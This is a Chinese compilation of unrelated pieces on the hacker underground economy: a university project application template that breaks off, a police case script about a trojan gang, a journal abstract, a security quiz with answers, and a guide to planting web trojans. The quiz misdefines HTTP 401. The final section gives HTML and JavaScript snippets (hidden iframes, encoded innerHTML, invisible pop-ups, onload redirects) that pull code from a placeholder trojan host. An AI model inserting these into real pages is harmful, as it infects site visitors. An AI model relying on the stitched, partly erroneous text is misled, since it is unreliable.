黑客产业链

中央财经大学2009年度本科生科研创新项目申报书模板注：申报人具体信息已省略项目名称：黑客产业链形成与演化的研究申请人：******：***依托单位：信息学院年级专业：07计算机科学与技术填表日期：2009年6月14日中央财经大学教务处制表申请者承诺与成果使用授权一、本人自愿申报中央财经大学2009年度本科生科研创新专项资金资助项目，认可所填写的项目申报书为有约束力的协议，并承诺对所填写的项目申报书所涉及各项内容的真实性负责，保证没有知识产权争议。

项目申请如获准立项,在研究工作中，接受学校教务处的管理，并对以下约定信守承诺：1．遵循学术研究的基本规范。

科学设计研究方案，采用适当的研究方法，如期完成研究任务，取得预期研究成果。

2．尊重他人的知识贡献。

客观、公正、准确地介绍和评论已有学术成果。

凡引用他人的观点、方案、资料、数据等，无论曾否发表，无论是纸质或电子版，均加以注释。

凡转引文献资料，均如实说明。

3．恪守学术道德。

研究过程真实，不以任何方式抄袭、剽窃或侵吞他人学术成果，杜绝伪注、伪造、篡改文献和数据等学术不端行为。

成果真实，不重复发表研究成果；对项目主持人和参与者的各自贡献均要在成果中以明确的方式标明。

4．遵守项目管理规定。

遵守《中央财经大学本科生科研创新专项资金管理办法》及其实施细则的规定。

5．明确项目研究的资助和立项部门。

研究成果发表时在醒目位置标明“中央财经大学本科生科研创新专项资金资助项目（项目编号：××××）成果”字样，项目名称和类别与项目立项通知书相一致。

6．正确表达科研成果。

按照《国家通用语言文字法》规定，规范使用中国语言文字、标点符号、数字及外国语言文字。

7．遵守财务规章制度。

合理有效使用课题经费，不得滥用和挪用，结项时如实报告经费使用情况，不报假帐。

8．按照预期完成研究任务。

项目立项获得批准的资助经费低于申请的资助经费时，同意承担项目并按预期完成研究任务。

安全防范警示录视频脚本：最近一段时间以来，利用计算机木马程序实施网络犯罪的案例不断出现，像盗取银行帐号密码、游戏装备乃至个人隐私，林林总总，让人防不胜防。

一条看不见、摸不着的黑客产业链正在形成。

有一个数据可能很多人都想不到，那就是中国的木马产业链一年的收入已经达到了上百亿元，非常惊人。

前不久，湖北麻城市警方就破获了一个制造传播木马的网络犯罪团伙。

这也是国内破获的第一个上下游产业链完整的木马犯罪案件，他们是怎么利用木马实施犯罪的？“木马”牛人被抓获归案犯罪嫌疑人杨某，今年20岁，网名：雪落的瞬间，木马程序的编写者，专门为不法分子量身编写盗取网上帐号、远程控制木马、木马下载器等各类木马产品和黑客工具，在黑客界被称为大侠，编程牛人。

麻城公安局邢大队长：“你前后写过哪些黑客软件？”犯罪嫌疑人杨某：“一个是依然下载者，一个是小耗子。

”犯罪嫌疑人韩某，22岁，网上人称黑色靓点，是木马编写作者雪落的瞬间的总代理，又被称作流量商。

湖北麻城公安局教导员邹远忠：“你主要负责什么？”犯罪嫌疑人韩某：“我主要是负责小耗子这款软件的批发、销售和代理。

”李某，网名好心情，黑色靓点的下线，行业内被称作包马人、洗信人。

负责用黑色靓点批发给他的木马程序，盗取他人QQ帐号和网络游戏帐号，并负责洗出游戏装备出售，牟取非法收益。

原本互不相识的几位犯罪嫌疑人，从2008年10月开始在网上合作制作、销售、传播木马，在不到半年的时间就非法获利200来万元。

湖北麻城警方历时一年多，从全国6个省市将他们抓获归案。

湖北麻城公安局副局长黄绍魁：“案件的案犯他们是一个有组织，有明确的分工，在网上集制作木马病毒、传播、销售木马病毒的一个非常完整的形成了一个产业链。

”说起来，可能你也不敢相信，杨某、韩某、李某这几个沆瀣一气的犯罪嫌疑人，第一次在现实生活中见面，竟然是在被警方抓到湖北麻城之后。

由此可见，这条黑客产业链有多么隐秘。

看来他们对网络犯罪已经相当熟练了，那么，这几个没碰过面的犯罪嫌疑人怎么在互联网上勾搭到一块的？他们这个黑色产业链又是怎么盗取他人帐号和隐私，大发不义之财的？事情还得从两年前发生在麻城的一个网络案件说起。

电信网络诈骗黑灰产业链犯罪隐语分析
崔蒙;吴剑
【期刊名称】《辽宁警察学院学报》
【年(卷),期】2022(24)5
【摘要】近年来,黑灰产业链成为治理电信网络诈骗犯罪的关键。

由于已形成较为完善的犯罪隐语,黑灰产业链的犯罪活动具有很强的隐蔽性。

梳理黑客技术、信息贩卖、链接渠道、资金转移等黑灰产业链环节后,可以发现电信网络诈骗黑灰产业链犯罪隐语具有三个特点:传统诈骗犯罪隐语较少,新造词比例增加;各环节之间共有犯罪隐语较少,专业性明显;各环节内部犯罪隐语初步聚合,具有一定系统性。

分析犯罪隐语的特点和规律可以帮助公安机关有效获得线索,打击电信网络诈骗犯罪。

【总页数】5页(P56-60)
【作者】崔蒙;吴剑
【作者单位】中国刑事警察学院治安学系;广元市公安局广元市反诈中心
【正文语种】中文
【中图分类】D917.6
【相关文献】
1.河北邢台严打电信诈骗"黑灰产业链"抓获团伙成员84人
2.如何避免成为电信网络诈骗黑灰产业链条中的"工具人"
3.河南严查网络诈骗黑灰产业链重点打击"两卡"违法犯罪
4.四川自贡警方打掉涉电信诈骗黑灰产业链
5.全国公安机关严打电信网络诈骗及其背后黑灰产业链取得显著成效
因版权原因，仅展示原文概要，查看原文内容请购买。

网络安全笔试题库（附答案）网络安全培训考试题一、单选题1、当访问web网站的某个页面资源不存在时，将会出现的HTTP状态码是—D—A、 200B、 302C、401D、404状态码：是用以表示网页服务器HTTP响应状态的3位数302:请求的资源现在临时从不同的URI响应请求。

401: Bad Request语义有误，当前请求无法被服务器理解。

除非进行修改，否则客户端不应该重复提交这个请求。

404: Not Found请求失败，请求所希望得到的资源未被在服务器上发现。

2、下列哪些不属于黑客地下产业链类型？—C—A、真实资产盗窃地下产业链B、互联网资源与服务滥用地下产业链C、移动互联网金融产业链D、网络虚拟资产盗窃地下产业链无地下产业链关键词3、许多黑客攻击都是利用软件实现中的缓冲区溢出的漏洞，对此最可靠的解决方案是什么？—C—（A）安装防火墙（B）安装入侵检测系统（C）给系统安装最新的补丁（D）安装防病毒软件4、下列哪类工具是日常用来扫描web漏洞的工具？—A—A、 IBM APPSCANB、 Nessus目前全世界最多人使用的系统漏洞扫描与分析软件C、NMAP Network Mapper是Linux下的网络扫描和嗅探工具包D、X-SCAN国内安全焦点出品，多线程方式对指定IP地址段（或单机）进行安全漏洞检测5、下列哪一项不是黑客在入侵踩点（信息搜集）阶段使用到的技术？—D—A、公开信息的合理利用及分析B、 IP及域名信息收集C、主机及系统信息收集D、使用sqlmap验证SQL注入漏洞是否存在6、常规端口扫描和半开式扫描的区别是？ BA、没什么区别B、没有完成三次握手，缺少ACK过程C、半开式采用UDP方式扫描D、扫描准确性不一样7、下列哪一个选项不属于XSS跨站脚本漏洞危害：—C—A、钓鱼欺骗B、身份盗用C、SQL数据泄露D、网站挂马跨站脚本攻击（也称为XSS）指利用网站漏洞从用户那里恶意盗取信息。

黑客是怎样“挂马”的？网页木马在本质上是一个Web页，但是又和普通的Web页面有很大的区别，首先就是由于其特殊性，网页木马无法光明正大地存在，只能隐藏在正常的Web页面中。

把网页木马嵌入到正常的网页中的行为，就是俗称的“挂马”。

挂马并不是仅仅将恶意代码写入正常网页这么简单，因为对于挂马者来说，希望网页木马的生存时间能尽可能地长，按照现在的黑客产业链的黑市价格，在一个大型社区网站挂一个小时的网页木马就需要几千元人民币，所以为了躲避管理员的检查，挂马的黑客们绞尽脑汁，网页木马的隐藏技术也因此得到了极大的发展，大致有以下几种。

（1）在页面插入一个隐藏的框架：在网页中插入一段如下的HTML代码：<iframe src=http://网页木马地址width=0 height=0></iframe>，其中width和height属性为0意味着该框架是不可见的，受害者若不查看源代码很难发现网页木马。

这个方法也是挂马最常用的一段代码，但是随着网站管理员和广大网民安全意识的提高，只要在源代码中搜索iframe这个关键字，就很容易找到网页木马的源头。

（2）利用JavaScript引入网页木马：相比iframe这个标签，<SCRIPT src="http://xx.js" type=text/javascript>这段代码就显得更加隐蔽，因为几乎95%的网页中都会出现类似的script 标签，利用js引入网页木马也有多种方法：*在js中直接写出框架网页木马，示例代码如下：document.write("<iframe width='0' height='0' src='网页木马地址'></iframe>")；*指定language的属性为"JScript.Encode"，还可以引入其他扩展名的js代码，这样就更加具有迷惑性，示例代码如下：<SCRIPT language="JScript.Encode" src=http://www. /mm.jpg></script>；*利用js更改body的innerHTML属性，引入网页木马，如果对内容进行编码的话，不但能绕过杀毒软件的检测，而且增加了解密的难度，示例代码如下：op.document.body.innerHTML=top.document.body.innerHTML+'\r\n<iframe src="http://网页木马地址/%22%3E%3C/iframe%3E'；*利用JavaScript的window.open方法打开一个不可见的新窗口，示例代码如下：<SCRIPT language=javascript>window.open("网页木马地址","","toolbar=no, location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");</script>；*利用URL欺骗，示例代码如下：a href="(/迷惑用户的链接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的正常内容</a>：<SCRIPT Language="JavaScript">function www_163_com (){var url="网页木马地址";open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no, scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");}</SCRIPT>（3）利用body的onload属性引入网页木马：使用如下代码就可以使网页在加载完成的时候跳转到网页木马的网址<body onload="window.location='网页木马地址';"></body>。